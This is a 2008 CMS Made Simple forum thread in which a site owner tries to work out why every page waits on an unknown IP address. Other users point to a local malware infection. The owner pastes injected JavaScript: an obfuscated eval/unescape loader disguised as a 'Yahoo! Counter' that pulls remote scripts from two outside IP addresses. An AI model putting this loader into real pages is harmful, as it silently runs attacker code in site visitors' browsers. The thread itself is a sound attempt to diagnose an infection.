CMS Made Simple Forums

Content management as it is meant to be
https://forum.cmsmadesimple.org/

admin and frontend waiting on 78.157.142.58

https://forum.cmsmadesimple.org/viewtopic.php?t=27939

Page 1 of 1

admin and frontend waiting on 78.157.142.58

Posted: Sun Nov 23, 2008 2:38 am
by dmgd
Every page I go to as visitor or admin status bar says "Waiting on 78.157.142.58

I found post about this but most all were WordPress site being hacked.

Anyone know anything about this?
I have deleted all file except uploads and config then uploaded latest version and ran /install/upgrade.php

Thanks for your help
Mark

Re: admin and frontend waiting on 78.157.142.58

Posted: Sun Nov 23, 2008 12:01 pm
by michi1979
Is the webserver running on this host ?
There is no server listening on port 80 (http).

Greetings,
Michael

Re: admin and frontend waiting on 78.157.142.58

Posted: Sun Nov 23, 2008 2:00 pm
by Dee
dmgd wrote: Every page I go to as visitor or admin status bar says "Waiting on 78.157.142.58

I found post about this but most all were WordPress site being hacked.
Do you only have issues on your CMS Made Simple site? (can you post a link?)

After a quick search on this IP the posts I've found point to a local script injection problem that changes/adds searchengine results:
http://www.bleepingcomputer.com/forums/ ... 75838.html
http://miekiemoes.blogspot.com/2008/10/ ... ngine.html

Make sure you're running up-to-date anti-virussoftware.
Try running a Malware removal tool like Combofix

Regards,
D

Re: admin and frontend waiting on 78.157.142.58

Posted: Sun Nov 23, 2008 2:02 pm
by dmgd
Thanks for the reply.
No this is not my host.

I did a little more research and some how this is added to the output just before .  I can not find where it is inserted.  I have deleted every file except config and uploads.  I see nothing wrong in uploads (only appropriate file extensions image flash)  or config.  Uploaded latest version and ran upgrade.  The following code is still inserted.

Code: Select all

<__script__ language="javascript">
1<!-- Yahoo! Counter starts here -->
2if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%76a%72?%20?%61$%2C@%69!%2C@%5F$%3B%69`%3D"%37%36%2E%31~63$%2E%22%3B%61%3D%5B|%22?7?8?%2E?%315%37`%2E1$%34%32$%2E%35%38%22|,i+`%22%31|%34~1!.#3#5"$%2C@%69+"?%31~%39%31.@1!%33~2"@%5D;%5F~%3D|%31@;`i`f@%28?%64o~cu$%6D%65!%6E%74@.co$%6F`%6B~ie%2E|%6Dat@c`%68`(`%2F%5C%62%68`gf%74=1|/%29$%3D%3D`%6E!%75%6C$%6C%29`%66$%6F%72%28%69!%3D?0;i?%3C`3;i`++~)`%64o?%63%75$%6D#%65%6Et`%2Ewr%69`%74%65(@%22%3Cs%63%72$%69~%70t#%3E!%69%66`%28%5F)%64|o|%63!um%65$%6E$%74?%2E~%77r%69te?%28%5C|%22@%3C%73%63%72%69p$%74~%20!%69~d=_|%22%2B|%69+"!%5F#%20%73!%72c!%3D%2F$%2F%22$%2B~a@%5Bi%5D`+%22!%2F@c~p!%2F%3E%3C%5C%5C!/!%73c?%72|i$%70%74%3E%5C%22@%29%3C@%5C`%2F%73cr?%69%70@t%3E?%22)#%3B').replace(/\||\$|@|#|~|\!|`|\?/g,""));var yahoo_counter=1;
3<!-- counter end -->
</__script>
<__script__>
1if(_)document.write("<__script__ id=_0_ src=//78.157.142.58/cp/><\/script>")
</__script>
<__script__ id="_0_" src="//78.157.142.58/cp/">
1
</__script>
<__script__>
</__script>
<__script__ id="_1_" src="//76.163.141.35/cp/">

Re: admin and frontend waiting on 78.157.142.58

Posted: Sun Nov 23, 2008 3:44 pm
by michi1979
Look at this post: http://forum.cmsmadesimple.org/index.ph ... 818.0.html

Greets,
Michael
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited